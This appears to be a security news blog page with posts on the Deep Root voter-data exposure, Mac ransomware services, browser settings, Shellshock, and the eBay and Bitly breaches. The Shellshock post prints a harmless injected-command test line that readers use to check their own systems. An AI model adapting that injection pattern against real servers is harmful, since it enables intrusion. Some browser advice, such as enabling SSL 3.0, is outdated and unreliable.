Web Security Updates

Deep Root Analytics: You Don’t Know Us, But We Lost Your Info…

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

A political data analysis company has exposed 198 million US voter records

Chances are you’ve never heard of Deep Root Analytics, and in this case that may actually be a good thing. The fewer people that know of the GOP data analysis company—the lower the odds your voter records were compromised.

That’s because, according to security firm UpGuard, Deep Root Analytics left a database containing 198 million voter records exposed for the world to see.

To provide a little bit of context, according to US Census information there are approximately 200 million registered American voters. Carl wasn’t a math major, but 198 over 200 is… basically, ALL the voter records.

An UpGuard Cyber Risk analyst named Chris Vickery, who found the files, notified federal authorities who we can only assume wrote a sternly worded letter or some other bureaucratic foolishness.

What? I Read It for the Articles!

A Deep Root spokesman told the celebrity gossip blog, Huffington Post, “we take full responsibility for this situation.”

Deep Root also said that it believes only Vickery accessed the information, which is a lot like when you come home after a hard day’s work, open your son’s bedroom door to say hello and catch him trying to stuff an old Playboy under his mattress. Then when you ask him about it he tells you he only looked at it the one time.

You know, the one time you caught him.

I’m not saying I don’t believe Deep Root Analytics, I’m just—well, actually, yes that is what I’m saying. I don’t believe Deep Root.

Deep Rooted Analysis of Your Personal Information

What’s more frightening than the fact that your personal information – names, addresses, political affiliations – was potentially just compromised by a group whom you never even consented to having possession of your data in the first place?

How about the analysis they were performing on that questionably obtained information?

Vickery downloaded over 1.1 terabytes of unsecured information. What he found was staggering, Deep Root uses 9.5 billion (with a B) data points to build a terrifyingly accurate model of 198-million US voters’ political preferences using advanced algorithmic modeling across 48 political issues.

Not only does Deep Root have an obscene amount of data about you – data you never even agreed to let it have – that data has been used to profile you and segment you into demographics.

Ok, How Deep Are We Talking Here?

DEEP. Without getting overly political, there was even more valuable data on both the 2008 and 2012 elections available on those servers. This information is potentially way more dangerous than your voter records.

This is information from DataTrust, the “GOP’s exclusive data provider.” There are two sets of 51 files, one for each state and the District of Columbia. Each file, which is in .CSV form, contains 32-character RNC IDs – one for every voter in the database, regardless of affiliation – that link a number of data points together.

The IDs can be used to look up voters by name. For a frame of reference, here is a list of all the .CSV categories:

Deep Root Web Analysis

For those who don’t want to parse all of that, these data sets include things like: date of birth, addresses, phone numbers, party affiliations, racial demographics, religious leanings, registration status, income information—even if someone is on the federal “Do Not Call” list.

That data appears to have been used by another GOP analytics group, TargetPoint, to create a model for the 2016 election.

In a 50GB file, each potential voter is scored against 46 columns, each of which contains a policy or candidate that the voter may or may not be likely to vote for. The GOP then uses this information for micro-targeting (both parties do this, it’s not as if the GOP are the only ones performing this analysis).

Here’s a look at the issues you’re being modeled on:

Deep Root Modeling Data Points

Per Dan O’Sullivan, who wrote the UpGuard report and looked himself up: “It is a testament both to their talents, and to the real danger of this exposure, that the results were astoundingly accurate.”

When I read that last quote, I got so scared a little bit of pee came out. That’s a terrifying amount of information. And all that data was exposed online for who knows how long.

But it’s OK, Deep Root believes the only one who accessed it during that time is the guy who reported it.

How reassuring.

Stay cautious, my friends.

MacRansom: First Ever Ransomware-as-a-Service Attack Strikes macOS

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

The first instance of ransomware-as-a-service has been discovered on the Dark Web

Many macOS users thought they were safe from the fury of the ransomware attacks – after all, Apple enjoys a great reputation for security – but security researchers have found traces of ransomware provided through a ransomware-as-a-service (RAAS) portal.

As far as Windows systems are concerned, these ransomware-as-a-service attacks (RAAS) have been around for quite a while now. This is purely down to the fact that Windows is the most widely adopted OS globally. Granted, macOS offers a more secure platform compared to Windows OS, but contrary to popular belief, that doesn’t mean that the Apple systems are safe from threats. No system in the world is 100% secure and macOS is no different.

However, this is believed to be the first case of macOS being targeted via service portals on the Dark Web. The ransomware-as-a-service portal allows wannabe cyber criminals with limited or zero coding skills to attack systems and earn a quick buck. From far, it appears to be a highly lucrative option. Therefore, it wouldn’t even be surprising to see high school kids having a go at it. All these budding miscreants have to do is contact the author on the Dark Web, retrieve the malicious code and spread it via spam emails.

Once the files are encrypted, com.apple.finder.plist and the original executable are encrypted by MacRansom. Recovery tools prove to be useless as it alters the Time Date Stamp.

The victim is given 7 days to pay the ransom. They must pay 0.25 bitcoins (around $700) in one week or else the encrypted files will be destroyed. To get the files decrypted, MacRansom requires the victim to contact on an email ID. On receiving payment from the victim, the perpetrator must pay 70% of the money to the author and he/she gets to keep 30% as the profit.

Initially, this was considered to be a big, loudmouthed scam by the research team of security firm Fortinet. The “customers” had to contact the developer instead of downloading the malicious files directly. To get it uncovered, the Fortinet research team tried contacting the author by pretending to be a middle-man and astonishingly, they got a reply from the developer. They found the MacRansom on the web portal of TOR. It proclaims itself as the ‘the most sophisticated Mac ransomware ever.

Sophisticated? Not so much.

The MacRansom can encrypt only 128 files in one go using a symmetric encryption technique. This puts a significant restraint on its impact as well as on its magnitude. The researchers at Fortinet have described the attack to be far inferior compared to the prevalent ransomware attacks on Windows OS. However, ignorance is certainly not an option as it is still capable of encrypting valuable information.

It is not the only “service” posing a threat to the Apple users, either. MacSpy, a malware-as-a-service (MAAS) attack, is a piece of trojan spyware targeted at Mac users. MacSpy can be found by following the same process. The same developer is believed to be behind MacSpy.

The RAT free variant is used to keep tabs on the targeted computers. The cyber attackers record the activities of the user by employing tactics such as keylogging, voice recording, intercepting the data transferred to cloud storage and capturing screenshots periodically.

It is reported that a paid version of MacSpy is also there. However, it is still unclear how many bitcoins it costs. This version is said to cause a substantial amount of damage compared to the free variant. MacSpy is supposed to be in beta test mode and therefore, it is not widespread at this point.

Explaining the reason behind these so called “services,” the authors give credit to the rising numbers of users adopting Mac. Stating the reason for creating MacSpy as a service, they cite that there was an absence of “sophisticated malware for Mac users”.

At this point, these attacks don’t represent much in terms of their scale and severity but they might be the harbinger of the things to come.

The Essential Security Settings You Must Check in Your Web Browsers

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.00 out of 5)
Loading...

Before you visit another site, make sure your web browser is running with optimal security settings.

Your web browser is essentially your portal to the internet. It is the vehicle you use to travel around the worldwide web.

It’s also your first line of defense when it comes to malware, hackers and cybercrime.

You probably don’t think of your browser in quite that way, but it’s true regardless. That’s why the browser community – the people behind popular programs like Chrome, Firefox and Internet Explorer (now Edge) – work so hard to provide you with security settings to help safeguard you from the dangers of the internet.

And guess what… you probably aren’t using all of those settings.

Here’s a quick guide for enabling essential security settings on three of the biggest browsers—Chrome, Firefox and IE 10.

Google Chrome

google chrome web browser security settings

There are a number of different settings you’ll need to check in order to optimize security on Chrome. We’ll provide you with a description of each, as well as directions on how to activate them.

  • Enable Phishing and Malware Protection – This seems like it should be a pretty obvious one, but not everyone has it enabled. To do so, simply activate it under the “Privacy” section of the settings menu. It will alter you if you’re about to visit a questionable site.
  • Disable Instant Search – Sure, it’s incredible convenient to be able to search just by entering your query in the address bar, but it’s not the most secure. Using this method, anything you type is immediately sent to Google. You can disable this in the settings menu.
  • Don’t Sync Your Email Account – Once again, what seems like an extremely convenient feature actually makes you less secure. By syncing your account with the Chrome browser, you’re allowing Google to store sensitive information like passwords and a autofill data on its servers. If you still want to sync accounts, at least turn on the “encrypt all synced data” option in the settings menu.
  • Turn Off Autofill and Never Save Passwords – If you’re noticing a theme here, it’s the convenience oftentimes comes at the expense of safety. Yes, it’s nice not having to type in passwords and finish entering data into certain fields, but by leaving these settings on you’re allowing Google to save that information on its servers, thus making it easier to steal.
  • Other Suggestions
    • Cookies – Choose the option that lets you keep local data until you quit your browser and make sure to block third-party cookies.
    • Javascript – Select the option that prevents sites from running Javascript.
    • Pop-ups – This one is pretty obvious, make sure you choose to block pop-ups.
    • Location – Turn off the feature that allows sites to track your location.

Mozilla Firefox

mozilla firefox web browsers security warnings

When enabling settings in Mozilla’s Firefox browser, you can access them through the “Options” menu.

  • Configure Privacy Settings – Again, it should be obvious why you would want to make sure to get your privacy settings set up correctly. You can find them under the “Privacy” tab. You’re going to set up Firefox so it stores only enough information as is needed for it to function properly:
    • Choose “Use custom settings for history.”
    • Unselect “Remember my browsing and download history.”
    • Unselect “Remember search and form history.”
    • Unselect “Accept third-party cookies.”
    • Choose the cookie storage option to “Keep until I close Firefox.”
    • Choose “Clear history when Firefox closes.”
  • Configure Security Settings – In order to avoid risky websites and prevent Firefox from storing your passwords, you’ll need configure your security settings in the “Security” tab.
    • Select “Warn me when sites try to install add-ons.”
    • Select “Block reported attack sites.”
    • Select “Block reported web forgeries.”
    • Unselect “Remember passwords for sites.”
  • Disable Javascript – Under the “Content” tab, unselect “Enable Javascript.” Javascript can cause a lot of problems, so it’s better to just avoid it all together.
  • Enable Pop-up Blocking – Also under the “Content” tab, you can select to prevent pop-ups, which is definitely recommended.
  • Don’t Sync – This isn’t a setting so much as a suggestion: don’t sync. Doing so allows Firefox to store sensitive information about you.
  • Turn On Automatic Updates – Under the “Update” tab, make sure you’ve enable the setting that automatically updates Firefox. This will ensure your browser continues to get vital security updates.
  • Use Secure Protocols – Under “Advanced,” select “Encryption” and make sure that “SSL 3.0” and “TLS 1.0” are enabled so that you can make use of encryption technology.

Internet Explorer 10

internet explorer web browser security settings

To access security settings in IE10, go through the “Internet Options” menu.

  • Configure Security Settings – Again, make sure IE10 has the correct security settings selected before browsing on it. To do this, select the “Security” tab.
    • Set Security Zones – This feature allows you to select individual security levels for different “zones” like internet, local internet, trusted sites, etc… Spend some time here and select your desired levels.
    • Set internet zone security to “Medium High” or above, as this will block certain kinds of cookies, enable ActiveX filtering and enable several other forms of default security.
    • Disable JavaScript – Under “Custom Level,” find “Active Scripting” and select “Disable.” Again, Javascript creates a lot of vulnerabilities—best just to avoid it.
    • Automatically Clear History – Choose “Delete browsing history on exit.” You can find it under the “General” tab.
    • Configure Privacy Settings – Do this under the “Privacy” tab.
      • Set internet zone privacy to “Medium High” or above.
      • Never allow websites to request your location.
      • Activate “Pop-Up Blocker.”
        • Configure Advanced Security Settings – In the “Security” section under “Advanced,” you can activate some additional security settings
          • Click “Restore advanced settings” to ensure all default settings are active.
          • Choose “Do not save encrypted pages to disk.”
          • Choose “Empty Temporary Internet Files folder when browser is closed.”
          • Turn off “AutoComplete.”
        • Tracking Protection – In IE10’s “Safety” menu is the Tracking Protection feature. You will need to provide a list of names of all the sites you don’t want your information being sent to, or you can download a list.

In Closing

These are the recommended safety settings for Google Chrome, Mozilla FireFox and Microsoft Internet Explorer 10. The internet is a dangerous place, the less information you make available to it, the less likely you are to run into trouble.

So make sure you have these settings enabled on your browser. And stay safe!

Enable Two-Factor Authentication – An All-in-One Guide

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

Everything you need to know about what Two-Factor Authentication is and how to enable it

Two-Factor Authentication is a phenomenal security tool that allows you to add an additional layer of security on top of the password you already use.

It works like this, when you want to sign in to your account on a new device for the first time you’ll be asked to provide a password in addition to a code that was sent to a trusted device. Once you offer both forms of verification – the password and the code – your account is unlocked and you can use it as normal.

Continue reading Enable Two-Factor Authentication – An All-in-One Guide

Shellshock: A Vulnerability More Serious Than Heartbleed?

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

Understand Vulnerabilities and Their Causes to Secure Website

The hits just keep on coming! We have yet again bumped into another software bug that threatens our web security. It has been hardly 5 months since the discovery of the ‘Heartbleed’ bug and now another nasty surprise has been uncovered, called ‘Shellshock’.

shellshock bug

What is the Shellshock Bug?

The Shellshock bug is the latest vulnerability that is likely to affect several versions of Linux and Unix operating systems. This was discovered by Linux expert Stéphane Chazelas on September 2014 in the UK. Linux-based web routers having web interface (using Common Gateway Interface) are also found to be vulnerable to Shellshock.

Alternately known as the Bash Bug, Shellshock is likely to be more severe compared to the Heartbleed Bug. As per the security experts, attackers can easily exploit the bug in the Bash and take complete control of the system being targeted. The United States Computer Emergency Readiness Team (US-CERT) of the Department of Homeland Security has issued an alert about this vulnerability affecting the Unix-based operating systems such as Linux along with Apple’s Mac OSX.

How Does Shellshock Bug Attacks?

A remote attacker can easily exploit Bash under definite circumstances. The attacker just needs to manage to force an application for sending a malicious environment variable to the bash.

Attackers are most likely to choose the route via web servers using the Common Gateway Interface (CGI), which is the most popular system used for creating dynamic web content. But, attackers tend to use it or exploit it to send malicious environment variable to the target system. As the Bash is used by the server for interpreting the variable, automatically it will also run the malicious command that was inserted.

The following diagram depicts how a malicious command can be injected at the end of a legitimate environment variable, which is later run by Bash.

shellshock bug table

Serious consequences follow, once an attacker is successfully able to exploit this vulnerability on a server. It may allow attackers to download harmful malware on the targeted computers or dump password files. Similarly, attackers can also compromise and attack other devices in the network after entering the firewall of the victim’s computer.

Why Shellshock is projected to be more harmful than Heartbleed

The severity of the aftermath caused by this bug can be understood only after highlighting the importance of the element it affects, the Bash.

To be precise, the vulnerability caused by Shellshock affects the UNIX Bash Shell. Bash, also known as Shell, is the common component of several versions of Linux and UNIX. The function of Bash is to perform as the command language interpreter, which means it allows the users to type the command in a simple text-based window that the operating system can run.

Bash is also used to run the commands, which are passed on by the applications. This happens to be the very feature that is exploited by the Shellshock bug. These environment variables are very dynamic, named values that directly affect how the processes are run on a computer. So, the weakness being exploited here is that the attacker can easily introduce a malicious code on to the environment variable, which will be run after the variable is received.

On the Common Vulnerability Scoring System (CVSS), Shellshock has received a straight 10/10, which makes it one of the biggest and most notorious bugs we have seen in the history of the Internet. And looking at the immense presence of the Bash shell, a large number of internet devices shall end up being vulnerable to Shellshock such as routers, Linux systems, Macs, web servers etc.

Apparently, Bash is the most widely used software in web servers at various organizations. Shellshock enables cyber criminals to attack a web server with the convenience of remote access to compromise the host. Once the victim organization is compromised, an attacker can completely take over the system, unlike Heartbleed – a bug in OpenSSL, where attackers could just spy on computers and not take the control of the system completely.

Procedure to Check your Computer’s Vulnerability

Rather than fretting about when and how your computer is going to get affected by Shellshock, it is advisable to find out for real if or not your computer is vulnerable to this bug. Here is a little procedure for that:

  1. Open the terminal on your computer and run the following command:
    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  2. You will see the following, if your system is vulnerable to the Bash:
    vulnerable
    this is a test
  3. However, if your system is well-patched and protected, you will see the following message being flashed:
    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test

Tips to Reduce the Risks of a Shellshock bug

Users can follow the tips mentioned here to reduce the risks of falling prey to this bug:

Online Businesses: All users of Linux/Unix-based systems are recommended to implement the patches immediately. The following are a few patches that have been released by their respective vendors:

Please note, Red Hat has updated its advisory for Shellshock after noting that its initial patch is incomplete.

Consumers: For consumers, it is advisable to apply patches to the routers and any other web-enabled devices, as and when the vendors provide them.

However, if the patch is not yet released for a particular Linux/ Unix, it is recommended to shift to an alternate shell till a proper patch is provided by the vendor.

EBay database hacked, asks users to change passwords

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

Lately cyber-criminals seem to be obsessed with the trend of hacking into users’ accounts on popular websites by stealing their login credentials and passwords. Last fall it was ‘Target Corp’ being hacked followed by ‘Adobe Systems Inc’ with compromised login credentials. This year, after the web-link shortening service, Bitly being attacked in May, online shopping giant, EBay is the latest name to join the list.

On Wednesday, May 22 2014, EBay advised its 145 million registered users of its website to change their passwords following a security breach in its database having encrypted passwords and some other non-financial data.

The online shopping giant provided some information about how the attackers hacked the site. It said they were successful to gain access in to the corporate network by compromising some of the employee’s login credentials, EBay informed. However, users’ passwords of EBay’s payment network PayPal weren’t compromised in this attack, clarifies EBay’s spokeswoman.

According to EBay, the database compromise was detected about 2 weeks ago though it occurred somewhere between late February and early March. The company chose not to inform its users right away as it investigated the extent of the attack. The spokeswoman said no group has yet claimed the attack’s responsibility and that the company has found no evidence indicating an unauthorized access to financial or credit card information as EBay stores that sensitive data stored separately. The hacked database consisted of passwords, email ids, birth dates, postal addresses and phone numbers. Following the news about the attack, EBay’s shared dwindled at Nasdaq on Wednesday.

EBay says the breach in its network is in no way related to the flaw in encryption tools ‘Heartbleed’, as recently detected by security researchers. Also, the company advises all its users who have set identical passwords for other sites to change all those passwords as well.

Chinese Government bans Windows 8 installation of on government computers

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

Chinese Government bans Windows 8 installation of on government computers

Chinese government has excluded Windows 8 Operating System from being installed on new computers, much to Microsoft’s ‘surprise’.

China’s decision to exclude Windows 8 from its new government computers came as a major blow to the US’ Microsoft, the technology company, which has long been dealing with the sales woes in this Asian country. On the website of Central Government Procurement Center, in a short statement about a specific class of energy-saving products, the agency noticed that the new government computers were prevented from having Windows 8 installed.

Sources find it interesting as this news comes in at a time when there is already animosity between US and China. On Monday, US pressed charges against several Chinese government officials for allegedly hacking networks in the US, to which China sharply responded by saying that US itself has engaged in cyber- spying against China. However, the point to be noted here is that the Chinese government’s decision to nix Windows 8 was taken last week, before the US accusation.

But, with seemingly mysterious reasons involved behind the ban, even till date the Chinese government has not explained its motives behind banning Windows 8 from the computers in the public sector. However, China’s official news bureau, Xinhua claims the ban is a result of Microsoft officially ended its ties of 13 years with Windows XP. And as noticed by Reuters, news bureau Xinhua has also vaguely cited reasons like ‘security measures’ and ‘effort to save energy’ as a potential foundation behind the ban. But the relation between Windows 8 usage and saving energy is found to be highly unclear. However, there is no further elaboration on this front from Xinhua or the Government of China. Xinhua also notes that Chinese government intends to develop and use its own Linux-based Operating System.

As per the statements given out by Microsoft, although it was ‘stunned’ by the decision of excluding Windows 8 by the Chinese government, the company would continue to provide Windows 7 to several Chinese government customers. As of now, which OS would be replacing the still-widely used Windows XP, is still uncertain.

Bitly accounts got hacked: What to do next?

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 2.33 out of 5)
Loading...

Stay Safe and Secure for Your Bit.ly Accounts

Bitly Hacked

The URL shortening service, Bitly happens to be the latest victim of the hackers. As per its CEO Mark Josephson’s latest blog update: an ‘Urgent Security Update’, they have found reasons to believe that their users’ data has been compromised. This vulnerable data consists of e-mail addresses, secured passwords, OAuth tokens and API keys.

Josephson mentions in the blog that they don’t have any indication that any of the accounts have been accessed without the permission. But as a preventive measure, the company has requested all the users to reset their account passwords. In addition to that, Bitly has also taken precautionary steps like disconnecting the social media profiles to ensure the security of all the accounts. The users generally signing in through their Twitter or Facebook accounts would be required now to reconnect their accounts.

This security breach in Bitly accounts might be a lucrative opportunity for the cyber-criminals, as most of the Bitly users link their accounts to Facebook and Twitter profiles. This opens the door for sending spam links and campaigns through this service. However, there is no confirmation of any such incidence as yet from Bitly. Also, as a precaution, if you are using the same password for Bitly and any other account, you need to change that password on the account right away. As there is a risk that the compromised Bitly password can be used to gain access to your other accounts.

Now, as per the blog update, the most important step for all the Bitly users would be to reset their API key and OAuth token. Please find below all the step-by-step instructions provided by the company, to help you reset your API key and OAuth token:

1) First of all, log in to your account and click on ‘Your Settings,’ then the ‘Advanced’ tab.

2) Now, at the bottom of the ‘Advanced’ tab’s menu, select ‘Reset’ next to ‘Legacy API key.’

3) Copy down your new API key and change it in all applications. These may include social publishers, share buttons and mobile applications.

4) Now reset you password by going into the ‘Profile’ tab.

5) Disconnect and reconnect any applications that use Bitly. You can now check which accounts are connected under the ‘Connected Accounts’ tab in ‘Your Settings.’

Apart from providing the basic information about the security breach and few precautionary steps to be taken by the users, Bitly chose not to explain how it found out about the breach in the privacy of customer accounts. Moreover, the company has shared no details about exactly which information the hackers might have gained access to.

It is important to note here that this security breach will not be affecting users who use Bitly just as a basic link-shortening service without signing in. However, it does affect all the registered users who use the tools like saved links, stat tracking and social network sharing. The attack can also potentially pose as a threat to all the website publishers who use Bitly to track and share story links.

Josephson signs off the blog post with an apology for any inconvenience caused and claims that their team is working hard to make sure all the accounts are secure and that they take users’ security very seriously. Users can check out latest updates on their Twitter feed: @Bitly. And for any account specific questions, they can send e-mails on [email protected]